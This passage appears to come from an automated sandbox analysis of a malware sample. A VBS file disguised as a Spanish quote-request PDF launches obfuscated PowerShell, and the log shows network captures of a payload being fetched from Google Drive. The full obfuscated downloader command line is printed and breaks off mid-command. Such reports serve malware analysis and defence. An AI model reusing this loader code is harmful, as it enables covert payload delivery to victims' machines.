                      2024-10-01 05:43:54 UTC1390INData Raw: 55 53 35 34 6c 75 32 41 39 35 68 63 77 59 77 79 7a 79 78 72 44 49 62 45 38 4a 69 31 6a 5a 46 4e 72 4e 53 57 62 6c 51 2b 39 6b 41 53 69 34 31 61 32 50 74 39 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 59 7a 51 34 35 2f 6d 2f 58 54 2f 53 48 63 71 42 44 72 37 30 6d 71 4c 68 71 35 47 36 30 53 7a 37 52 50 51 6a 65 70 6b 6d 38 4e 69 61 34 33 76 63 56 50 54 67 73 7a 33 2b 48 35 30 6b 31 47 37 62 4e 49 63 4e 32 70 36 51 57 4c 43 6b 30 54 4a 57 37 57 36 78 46 73 75 7a 2f 78 37 59 63 4a 34 42 4b 39 4d 4a 6c 49 6b 37 2f 46 30 4d 52 51 35 75 76 6f 74 77 6e 61 35 70 69 4d 79 72 6b 66 30 4f 4f 69 63 4d 4c 44 66 55 33 77 4f 43 78 5a 35 46 50 46 57 4b 4c 47 47 52 31 4d 54 4f 61 77 56 46 54 7a 53 37 48 69
                      Data Ascii: US54lu2A95hcwYwyzyxrDIbE8Ji1jZFNrNSWblQ+9kASi41a2Pt9W8+7fVvPu31bz7t9W8+7fVvPu31bz7t9W8+7fYzQ45/m/XT/SHcqBDr70mqLhq5G60Sz7RPQjepkm8Nia43vcVPTgsz3+H50k1G7bNIcN2p6QWLCk0TJW7W6xFsuz/x7YcJ4BK9MJlIk7/F0MRQ5uvotwna5piMyrkf0OOicMLDfU3wOCxZ5FPFWKLGGR1MTOawVFTzS7Hi
                      2024-10-01 05:43:54 UTC1390INData Raw: 31 62 7a 37 74 39 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 61 42 46 74 4c 38 55 75 35 37 6f 4f 74 71 65 45 78 45 7a 39 34 51 34 4f 4a 45 4d 73 39 2f 35 4e 6d 2f 46 7a 70 32 72 33 69 57 4e 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 56 76 50 75 33 31 62 7a 37 74 39 57 38 2b 37 66 56 73 36 7a 4a 4f 37 59 39 6f 78 51 51 78 79 69 73 34 72 56 34 56 72 6a 4b 39 57 63 70 65 70 76 78 64 38 51 54 43 75 39 41 63 65 6f 6d 70 6a 59 6d 34 69 41 77 77 6a 30 34 54 56 39 65 54 6a 37 47 6e 78 6f 33 45 67 35 65 42 47 35 65 48 45 7a 7a 55 55 36 7a 6b 4b 37 4f 46 69 33 32 4a 4a 68 38 71 59 30 4e 61 58 41 32 74 38 6e 37 70 62 57 4f 31 4c 55 4b 55 53 36 74 43 57 33 6c 64 64 31 55 55 75 2f 2f 31 50 68 36 63 53 65 79 45 56 68 55 53 73 61
                      Data Ascii: 1bz7t9W8+7fVvPu31bz7t9W8+7faBFtL8Uu57oOtqeExEz94Q4OJEMs9/5Nm/Fzp2r3iWNW8+7fVvPu31bz7t9W8+7fVvPu31bz7t9W8+7fVs6zJO7Y9oxQQxyis4rV4VrjK9Wcpepvxd8QTCu9AceompjYm4iAwwj04TV9eTj7Gnxo3Eg5eBG5eHEzzUU6zkK7OFi32JJh8qY0NaXA2t8n7pbWO1LUKUS6tCW3ldd1UUu//1Ph6cSeyEVhUSsa


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.749707142.250.185.1424438116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      2024-10-01 05:44:37 UTC216OUTGET /uc?export=download&id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                      Host: drive.google.com
                      Cache-Control: no-cache
                      2024-10-01 05:44:38 UTC1610INHTTP/1.1 303 See Other
                      Content-Type: application/binary
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 01 Oct 2024 05:44:38 GMT
                      Location: https://drive.usercontent.google.com/download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download
                      Strict-Transport-Security: max-age=31536000
                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                      Content-Security-Policy: script-src 'nonce-PK031iTMadk1f_KgYHOedQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                      Cross-Origin-Opener-Policy: same-origin
                      Server: ESF
                      Content-Length: 0
                      X-XSS-Protection: 0
                      X-Frame-Options: SAMEORIGIN
                      X-Content-Type-Options: nosniff
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.749708142.250.181.2254438116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      2024-10-01 05:44:39 UTC258OUTGET /download?id=1WV4yC4jy06NPBMZa4UByVclKHGEcIK_f&export=download HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                      Cache-Control: no-cache
                      Host: drive.usercontent.google.com
                      Connection: Keep-Alive
                      2024-10-01 05:44:41 UTC4874INHTTP/1.1 200 OK
                      Content-Type: application/octet-stream
                      Content-Security-Policy: sandbox
                      Content-Security-Policy: default-src 'none'
                      Content-Security-Policy: frame-ancestors 'none'
                      X-Content-Security-Policy: sandbox
                      Cross-Origin-Opener-Policy: same-origin
                      Cross-Origin-Embedder-Policy: require-corp
                      Cross-Origin-Resource-Policy: same-site
                      X-Content-Type-Options: nosniff
                      Content-Disposition: attachment; filename="AdaOvKwRExIVoUgGjncZSiKgxzCr41.bin"
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Credentials: false
                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                      Accept-Ranges: bytes
                      Content-Length: 106560
                      Last-Modified: Mon, 30 Sep 2024 01:14:56 GMT
                      X-GUploader-UploadID: AD-8ljveBo033eVEdYVrMNeVB0r-rdLvezi7qv4UElu9DSQr7ArRzf8EQnptorFBVC5h1cbhXtQ750Z1Sg
                      Date: Tue, 01 Oct 2024 05:44:41 GMT
                      Expires: Tue, 01 Oct 2024 05:44:41 GMT
                      Cache-Control: private, max-age=0
                      X-Goog-Hash: crc32c=NuJ1eg==
                      Server: UploadServer
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close
                      2024-10-01 05:44:41 UTC4874INData Raw: 4c d4 d0 e8 0d e5 26 cb 32 34 15 95 8a 0a e7 8a 38 57 03 dc 8a 9c 04 ec 60 50 3a 10 29 b7 60 a8 bd 4c a4 a4 3d af 33 a9 68 60 72 4d a2 5b 06 85 00 b8 8a 9b 26 9f 4b 6e 38 0f 48 3e d9 a3 92 8c e6 88 c0 e3 97 85 54 3c c4 dc 12 19 3a b8 ee e2 bc 06 4a 4a 73 3b b0 96 ac cd b8 0c c3 e5 5b d1 81 ac 4b a9 22 a1 d0 b3 b7 40 df 9d af 5b 0a dc 3c 41 32 e3 67 19 69 f5 c8 c3 fa 1e 03 56 58 02 fc dc d7 49 e1 0a de ad 99 a7 0e f1 a9 9a 33 f9 7b 42 85 c9 1c 1c 79 2a 8d 3b 45 0d ab 00 48 42 a7 84 e9 1f 90 4e ee 27 62 12 25 bc 38 0a d4 2c b9 19 21 35 77 8b df 5a 6f 76 1e 7d 79 21 bc 18 ca de 2b 3d 33 86 9e 5f d9 f8 e5 ce 66 48 ed eb f6 be be 0d 23 21 51 6c b3 35 7a d7 2d b8 19 37 74 cd 3e dc e0 ef e1 88 70 b7 73 e6 33 e3 5e 5e 0a eb 89 ed 5c af a5 60 74 aa 01 e8 78 f1 f3
                      Data Ascii: L&248W`P:)`L=3h`rM[&Kn8H>T<:JJs;[K"@[<A2giVXI3{By*;EHBN'b%8,!5wZov}y!+=3_fH#!Ql5z-7t>ps3^^\`tx
                      2024-10-01 05:44:41 UTC4874INData Raw: d3 c6 ee f6 d2 c4 c7 82 8f b0 e3 9f 2a 20 53 8c b6 47 d0 fe f5 5e 82 24 59 99 bf d1 f2 57 0b ee 87 6a d9 4b 38 16 e0 6f 91 16 7a 74 24 17 90 2c f2 7f 93 70 e9 00 d7 f1 93 97 76 d4 75 36 48 53 dc 42 b3 b6 10 43 8c 20 96 47 e1 1b c8 49 20 89 ca a5 d9 0b e0 01 61 b4 1c cc f8 62 d2 b9 9e 77 ad a8 05 14 81 a7 5f 63 4a cc 18 39 65 9a 4b ef 50 18 db f8 56 95 f5 65 77 79 06 a9 63 98 71 79 a2 15 4e 79 1f 9c 50 f3 c8 7c c7 16 a4 20 32 ea e7 c6 f3 3e 0e 20 7d af 47 87 cb ea 89 55 e2 a8 b0 43 a2 05 d7 6a 7f 4f a7 da de 69 78 53 16 cf 69 1d 9f 3b 97 0a bd 8b 30 ca 55 26 6a 26 30 84 e0 2f b2 12 5b e7 1d fd 12 38 65 b5 6f 6b 06 61 ad b8 8a d5 3d c2 64 93 94 14 f9 46 5c a5 b5 a8 3e fc db 1e 4b b4 09 cf 73 90 ff 09 a1 6b e8 3c 63 69 c3 95 48 65 3d aa 98 81 0a c9 c6 3e c9
                      Data Ascii: * SG^$YWjK8ozt$,pvu6HSBC GI abw_cJ9eKPVewycqyNyP| 2> }GUCjOixSi;0U&j&0/[8eoka=dF\>Ksk<ciHe=>
                      2024-10-01 05:44:41 UTC76INData Raw: 96 78 b6 41 23 22 aa 59 45 c4 17 53 48 fe d2 63 00 04 df 1f e0 d3 f8 5b 07 77 6a 7d f7 de ce cc bc ec 13 ce 0e 9b 97 f0 84 8a 5a a4 4c 7d e3 b6 25 4d f1 ae a3 ee 4f 48 f3 23 53 3f 01 d0 88 87 75 70 88 f7 07 0e 28 e9 58 7e f3 f7
                      Data Ascii: xA#"YESHc[wj}ZL}%MOH#S?up(X~
                      2024-10-01 05:44:41 UTC1323INData Raw: 13 2b 0a 32 05 3f 99 c3 d5 8b 8f 9c 6a 82 53 d6 99 00 a2 30 35 23 27 34 1c 3f c1 51 bc 4d 12 3b 91 a5 88 34 57 4c c2 fb d6 97 9c 6f 76 a0 cf 05 7e 15 23 b1 2a 65 42 e7 e9 0b ca 6c a4 d7 1e 6a 90 0a a7 40 1a af ed 76 35 23 50 11 c0 3e 74 1d 69 63 e3 07 f5 d3 c5 d8 d1 54 d9 5c 2d 4a 0c de 78 f8 f2 15 16 21 61 04 81 0a 6a f3 fa 3e c6 63 3a 0a 85 c8 6a af f1 12 9f 62 44 2f c1 77 4a 49 e7 c7 4f e0 11 d5 19 90 70 9e 15 e0 d1 6c ca e7 b1 9f 10 e6 74 4a 7e 2f 57 90 28 04 c5 f2 58 ea a8 39 18 3d fd af 62 a4 d3 62 d1 ec 45 35 05 83 f6 17 f1 04 61 6d de 4d 9e 79 4b 4f 78 d1 4d ca fa d6 43 5b 75 3b 75 cb 79 24 ca 83 52 e7 e7 f8 4b f8 98 cd 53 21 fc 84 4e 4a 5b b3 e5 43 4c c4 a5 08 e8 9e 18 4c a1 58 db b5 c2 ba 6a 39 98 1e ca 40 66 2c a2 75 05 22 59 5e ba b8 e2 92 5a
                      Data Ascii: +2?jS05#'4?QM;4WLov~#*eBlj@v5#P>ticT\-Jx!aj>c:jbD/wJIOpltJ~/W(X9=bbE5amMyKOxMC[u;uy$RKS!NJ[CLLXj9@f,u"Y^Z
                      2024-10-01 05:44:41 UTC1390INData Raw: 70 17 77 12 9b 4f c3 a4 10 84 75 00 55 8d 57 e5 57 1c 01 ca 5d 64 0d 0e 65 d5 04 d2 7c 03 a3 d2 a4 78 e2 dc 3e 6a 41 7d 8f fe 40 1b e0 2c 7d 30 e4 93 cc ae 09 98 e8 1f 88 23 73 2e 6b 60 ea 54 70 e4 52 6c 72 8a bc 17 11 e5 6e 72 6d 43 ce 5b bc 7b fb 96 79 a9 4b 1b 73 d8 dd a9 c1 bf b6 fd bc aa 05 58 a0 53 69 91 47 bd 0e e8 e2 cc bc 7d f3 8a b3 f2 96 ef 2b 1d 5b 61 4e a1 5f a0 87 ec a6 00 59 54 c2 02 84 fb 96 78 c5 32 cd 13 5c 7d 25 43 cb b3 e7 d5 bd 22 62 99 ec ec 54 e8 63 00 ae 4c 13 b7 fb b6 dc 81 f6 ba 72 2d 56 e3 61 ea 55 09 4d dd 40 64 72 89 ac 29 97 93 9e f3 14 6f ba 33 5a 42 4c 6e 71 de 97 b3 ca a9 29 a1 ac f2 b0 c1 6c 1a 4a 7e 86 b7 d0 d0 c4 76 f2 ab e5 bf e4 28 5d 58 a2 72 91 26 54 b8 d9 81 16 25 5f fc dc 1e cc 36 9f 23 01 5f 53 c2 bf f3 29 9f e4
                      Data Ascii: pwOuUWW]de|x>jA}@,}0#s.k`TpRlrnrmC[{yKsXSiG}+[aN_YTx2\}%C"bTcLr-VaUM@dr)o3ZBLnq)lJ~v(]Xr&T%_6#_S)
                      2024-10-01 05:44:41 UTC1390INData Raw: 0a ba e4 17 a8 29 be 89 7b 0a af 17 d2 69 b0 d3 0a c3 22 1a 11 41 81 a8 5b 6f 14 89 6d 81 9d 5c 0e a5 e4 6f 2c 0c 3b 3e 71 9e 8f 34 e9 e6 96 24 6c 7f e6 a0 3e a9 79 6c b4 19 6b 21 b5 b3 fc 7f 7e db 51 21 61 cf d6 e6 81 d2 26 9f e4 d0 c3 79 97 ea a4 45 16 a1 40 92 fa 95 53 85 f4 7f 8f 70 b6 b1 15 48 07 1d 85 26 fa da df 4e ed 32 85 da 15 3a 56 05 00 ef 4e cb a2 e9 59 f8 49 3a 51 3a ba 7e 6b 75 46 34 d1 5c e7 02 68 e6 cc 3b 23 dd ae fc ee 39 cd 00 eb 79 58 54 d6 04 85 0a ae 49 ba fc 8f 8a 3b 34 f2 14 b5 7c 41 b9 f2 db ac c5 f0 67 9b 55 9d 42 39 69 2c 3d 9b aa 75 fd 7b 02 2d ac 92 04 d9 d1 07 3a 2a 2a 00 c5 4b 1f 09 ee b5 63 db 60 5f 8b 23 21 65 a7 3e c1 e4 47 e6 3e d9 6c 98 22 12 7c 4c 0f 6f c3 24 0c 1a de 07 36 4d 06 ed fd f9 46 59 1e 32 d8 58 a2 26 13 c4
                      Data Ascii: ){i"A[om\o,;>q4$l>ylk!~Q!a&yE@SpH&N2:VNYI:Q:~kuF4\h;#9yXTI;4|AgUB9i,=u{-:**Kc`_#!e>G>l"|Lo$6MFY2X&
                      2024-10-01 05:44:41 UTC1390INData Raw: 63 51 fb 31 50 be 73 c6 e9 b3 fc 01 7f 52 17 05 3f 77 f2 de f8 4f af 81 77 25 05 14 b6 2b 0a 6b b3 ef b2 95 39 88 9e ad 54 35 59 af 20 eb 17 50 59 fb 2b ae 8e fa 38 f7 16 10 2f 64 2e 8c 6d ad 73 d7 62 75 7d 8d 9c 33 19 b1 70 a9 39 2a a2 c3 16 2e d7 63 be cf 8e 6b 6c 9f 95 61 35 3a f2 a4 1f a0 46 f9 70 94 34 06 5e 3a 70 1e 3d ca ef 7f a2 0d 06 32 2b 84 58 fc 42 8d f0 a5 78 05 13 87 7d 57 39 70 e6 d0 3e 82 f8 31 b0 47 36 36 11 95 58 88 5e 4f 91 ff 0b 07 6a a3 ac ae cd 2a ff 3e f6 ba 17 86 18 ff 18 c2 59 d8 16 8a be 82 a7 9d 5f 36 aa 30 c5 a7 d9 97 f1 44 c8 b0 e7 45 c1 96 f4 66 6d 71 ae f5 49 86 c6 bf 65 b8 2b bb 36 2a 69 de 25 17 6a 30 94 68 62 e5 ef ea 54 b9 01 cb 8e b5 b8 01 86 78 d8 47 0c 50 b7 ce e6 88 67 37 a3 37 e3 d9 4f 7c e6 3d 1e 3e 72 9d fc ab 62
                      Data Ascii: cQ1PsR?wOw%+k9T5Y PY+8/d.msbu}3p9*.ckla5:Fp4^:p=2+XBx}W9p>1G66X^Oj*>Y_60DEfmqIe+6*i%j0hbTxGPg77O|=>rb
                      2024-10-01 05:44:41 UTC1390INData Raw: 6f 5b e3 30 ad cc 35 6e 18 6a 92 4d 4b 9b f2 fc ed 69 ee 61 4d cd 16 92 4c 63 c0 8d 4f f1 46 c7 71 fd 21 60 ac 82 08 ba 8c 69 96 14 9e 8e 2d d3 f6 04 63 20 3e 63 23 c4 d5 3c f9 ee ea fb 49 2d 4b 04 1d fb f9 3f 5a 8c 4e bc 69 99 c5 47 dc 9e 26 0e 5a 6d 2d a7 85 20 a1 d0 e5 e0 73 29 5a 2a 8f f7 23 c3 6d 30 e3 67 4f 3f 9d 9b f5 0d ea a5 be 83 eb 0d 3c 3b 2d e3 41 07 eb 40 9c f0 42 10 f3 31 c7 7a b8 a3 ee 98 98 02 a7 99 5e e8 eb 32 93 d9 d2 83 4c 5a 6c b0 3c c2 10 c7 bb 3e 81 2a 13 ef 42 40 3a 97 06 b1 22 3b af b4 fb 93 a9 84 de 43 49 51 ec 83 46 7b 5f 58 19 57 df 46 bf 13 1b 04 11 9f 89 d8 5f 55 d4 18 4a 3e c8 ba 9f fa d7 5a 11 15 3c 14 b1 39 13 9f f8 e1 29 65 1b 31 0a b4 1b eb ae 60 bf 5d 4e 4f 9c 0a 0b 8a ba 21 d6 a0 5b 80 1e 42 51 80 7e 21 71 ba 30 3f 3a
                      Data Ascii: o[05njMKiaMLcOFq!`i-c >c#<I-K?ZNiG&Zm- s)Z*#m0gO?<;-A@B1z^2LZl<>*B@:";CIQF{_XWF_UJ>Z<9)e1`]NO![BQ~!q0?:
                      2024-10-01 05:44:41 UTC1390INData Raw: e6 e1 40 5f ed c7 d7 4c 28 aa e0 19 ad 9c 21 d5 ea e3 e5 37 ed 5e 77 a3 b8 8d 54 dc d6 e6 5e 0b f8 e7 33 3f 10 5a 78 0f 97 a8 1b 43 b4 e8 e5 b8 e4 29 c9 df 60 45 ea 50 42 05 76 7f 09 7d a9 46 33 1d 15 7b 15 6d 9e 32 87 f6 ba ad 4d 0b a6 28 c8 ac 22 c1 e9 51 da 19 d3 08 43 df c4 e0 6e c8 c8 fd de 61 1c 4b e5 e8 7e ec 4f 7c 1a ff a4 23 ea 0a 42 7a 93 e7 8f 30 1b b0 8f e8 cb 35 51 c2 a9 c4 c0 28 c8 f8 88 b8 b0 55 a8 0a ec a8 b7 62 98 f2 00 ae 1f 9c 00 a8 3e 54 2b af 47 1c a8 0e 38 29 71 a7 59 2a 3d a5 51 0c a6 97 8d e0 df e3 ee 46 41 c1 c4 48 b8 ef 20 56 ee c2 fa 72 86 35 72 fe f2 1d 00 21 e8 29 63 0d 74 ac 49 31 7d d5 cf 27 da a5 78 f0 f2 3e 6a e7 3b 47 56 8c b5 05 71 3d a1 7f f4 c3 52 74 9b ae 7c b0 8a 3d d0 66 5f 62 50 a7 f2 3d 92 21 d9 bc df 9d 4a c6 e7
                      Data Ascii: @_L(!7^wT^3?ZxC)`EPBv}F3{m2M("QCnaK~O|#Bz05Q(Ub>T+G8)qY*=QFAH Vr5r!)ctI1}'x>j;GVq=Rt|=f_bP=!J
                      2024-10-01 05:44:41 UTC1390INData Raw: 7e cc 7c 47 8f 88 94 f0 24 eb 69 e6 aa 1c 5c 83 cf d5 1f ad 68 d5 e5 50 48 f6 e1 30 13 ac d1 4c bd 21 6c 29 be e4 da ea 4f 8a f6 f2 10 b5 b7 2e dc bc de f3 ed 75 30 4c 07 2c 09 54 83 e7 04 30 21 4e f1 00 e4 4a 83 b3 02 5e c2 68 38 28 81 c8 79 f2 f0 67 61 92 c4 cd 36 06 06 37 00 97 f3 d3 b6 c1 d3 53 34 0e 05 6c 30 a5 fa c8 ad 13 c3 fc 20 24 de 19 00 e5 39 d1 35 95 9f 15 ec 43 4e fe 85 c7 ad 5e b2 87 52 65 01 05 a4 91 39 6c f5 cc 83 a4 48 5c 2e ac c9 ac 09 0a 72 ff e1 77 1a 72 38 6e 6f af 66 6d 87 de 3b ee 7d 05 2d 72 49 05 82 6b ce c2 dd 92 0b 57 d7 5e 80 75 b0 23 7e 92 17 66 58 80 42 29 8b 35 5f 96 0d b0 c7 83 6a c4 43 59 fc 19 44 90 7f 2c 0c 27 e0 cb 37 fc 0b 5d e1 0f db 7b 7d 3c ac b5 6f 4d cf fd 5e 98 e9 99 4e 89 df 99 11 38 de 9e 69 d8 7b 1c 90 50 b7
                      Data Ascii: ~|G$i\hPH0L!l)O.u0L,T0!NJ^h8(yga67S4l0 $95CN^Re9lH\.rwr8nofm;}-rIkW^u#~fXB)5_jCYD,'7]{}<oM^N8i{P


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Target ID:0
                      Start time:01:43:44
                      Start date:01/10/2024
                      Path:C:\Windows\System32\wscript.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs"
                      Imagebase:0x7ff621150000
                      File size:170'496 bytes
                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:true

                      General

                      Target ID:8
                      Start time:01:43:47
                      Start date:01/10/2024
                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Inartistical Turkisen Reenforcement #>;$Hollingsworth='Tffelheltene';<#Niveaudelen Ufordjeligheds Initiativriges Honourarily Husbukkens #>;$Husspildevandet=$host.PrivateData;If ($Husspildevandet) {$Antoecians++;}function Dioptres($unjoint){$Curvograph=$Repolarized+$unjoint.Length-$Antoecians;for( $Aftest=5;$Aftest -lt $Curvograph;$Aftest+=6){$Injoint+=$unjoint[$Aftest];}$Injoint;}function Unhandled($Gaggling){ . ($Reprsenterende) ($Gaggling);}$Phoronomy=Dioptres 'nitroMInt,moBergazS,nneiU derlkommalMat iaMac.o/ star5Agend.Korpu0P rfo Sinds(La.ooWReacci SklenNringdBaandoRoun.wGrundsVirke AlpegNUnde TSnoha L,gen1Tekno0 Mass.P.rdo0Tolkd;Insuf FertW twiniFldern Murp6 Skel4Trans;Sygem astox Fo h6Dal e4Agers;.hili Naz erProtevSu.er:Cog i1S aak2vask.1P ani. ambu0Their)sunny ShelGRidseeUrfjecFolkekMaddio En,e/Wheel2Uncli0Ko ce1Skide0Prebl0Zo ia1Firma0benz.1A kom FimreFFahreiDecidrDrifteWind fstrudo,geerxUd.ul/bo,ca1Optra2 Li h1Bortk.Skaml0 Sejr ';$Jordskorpens=Dioptres 'Ph noUGy suS Ba eeRaggeR Beha-FlubbABlowoG Out EDuodeNApo.tTDefin ';$Patienternes=Dioptres ' osethErhvetMora.tCoccopFibrasNdlgn:Mi ti/ Elys/Sk.ggdDiu nrBag jiPre evudfale Knub.Im.ergStiloo FraaoHtt ngLegeml E ekeSolit.SparpcCreamoSalgsm Wind/ FrdiuSi etcNavne?Kni aeIndspxSacchpEctoboSkat,rK nklt Thon=slenddObli.oChirkwCrassnLbeselGlasso B gnaTopkodEnang& ProgiUdskidPluvi=orthi1 SeizETurk 2Varmt2TankrhA rcaSTrkniDCucu.R nelif anrgLImplaSHerpeprubriLRegioTD.scihSuppomUforfHCorr,EMac r9Acco.wTyggejTajikU erebG GorgQDyrticGiese-IntertLagomb Hist9UnvexaMymarxHjtekJArinbLInter ';$Dispowder=Dioptres 'Ruteb> Turo ';$Reprsenterende=Dioptres 'V aleIToldkE VarmXEq,al ';$bytrafik='Konfektionerings';$Peninvariant='\Tallowweed.Kli';Unhandled (Dioptres 'Pneum$Predigpe tal onio KompbAboliaSammelConca:NatteGor.ngeriftmnStr,bd FilaiH ndsgsub etEnchae aurnengrod ybeeFishi=fae y$C ipse H frnAssumvOmb g: Extra ignpPan rptro jd Wis a Helbt Kk,eabehnd+ onse$HoughPMiosie.ruppnSeminiSilvan RimevAffe aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fogydom=(Dioptres 'Mildh$FysikGDiffeL SusloWholiBMidlaaS,orsLIndis:objecDForbri,rlaaAHogowpSqua.HLuftlEI.surmChapeeAe,opTdyngerHan,ki ,fpaCBalal= SkrinGaddieTakstW Labi-Icer oHybriB herpJMorolEPenwoCE,ectTLangf VirakSFors YForb.SPreaxTPlataE Weekm Epic. BrkeNAgat,eAf,erTDivin. uiriWSoa aE roftBOpparCLocomLTransI,okuseO sigNpast.TDenti ');Unhandled ($Fogydom);Unhandled (Dioptres 'A ago$Assesd.yrani Pantaen.ompInninh Erine blegmOp raeHarmatAssocrNonspi,irkucviol .RegulHNbsune tabuaTr wld Flive portrDightsPisto[ T.ig$ neigJPermio B,drr UndedTra ksSalgsk SafroBrandrM ndipdebete Anstn HekssSekon]Betnk=Cardi$Spi tP .illhTungeoRe enrIndbloC,mpunKalk.oIce pmLestsyPreso ');$Tailwind=Dioptres ' ilde$ Upstd retriSikkeac bolp FatahSuffleSpun mStudeehoo.rtP ilor obbi ndelcAnfre.BesegDSlaveo Bev,wse denSpejllSlagtoKundeaUniondvingeFParaliMar ylSix,eeCadav(Ligbr$PapirP Billa ienetFuldkiSemipeGarg nU.pertrom nenick rFono.n H jseJaywasOve.b,Intra$ MeloDRterseSlimilFar,ii ImmekInimiaHjrest UndeelevnerRaphaeUdtryrPaa k) Fo b ';$Delikaterer=$Gendigtende;Unhandled (Dioptres 'Gaunt$Cons,guncouLHummaoforunBInhalaInt.rLspros:M,ldeSforfek gav lDimenvferieElibecSTilsk= co,f(DecimT .ndbeUlvefSSagamTelvil-TetraPAfvrgAC midt Grunh Node lave$S rikDA rime hoklPhiloiDalstKBesaaA AlbeTN ingeAgonirKonkre .nprrTypeg)Deput ');while (!$Sklves) {Unhandled (Dioptres 'Paryk$ Indkgbattll SkatoTheribWarluaN.dstlafble: Mir Acancef PsycsTolyltAflsetBob seBardelVitiasChromeJulek=Indlg$LudvitBeklirSusp.uSo tseAurig ') ;Unhandled $Tailwind;Unhandled (Dioptres ' PjasSMedict BltuaAnkusrinvestU bar-CamatSReplil adseeNondiePalmepAfgre Abel4Togvo ');Unhandled (Dioptres 'Studd$ FourgNondelCrut o Ruinb Trmaa Do xlIntel:SamhaSFi,erkRem.tl HomevTripteAf ensAbonn= Kolo(.odgaT ZabaeGasops BesttDishl-ReimbPhemola RayatN elshImp,n Rem 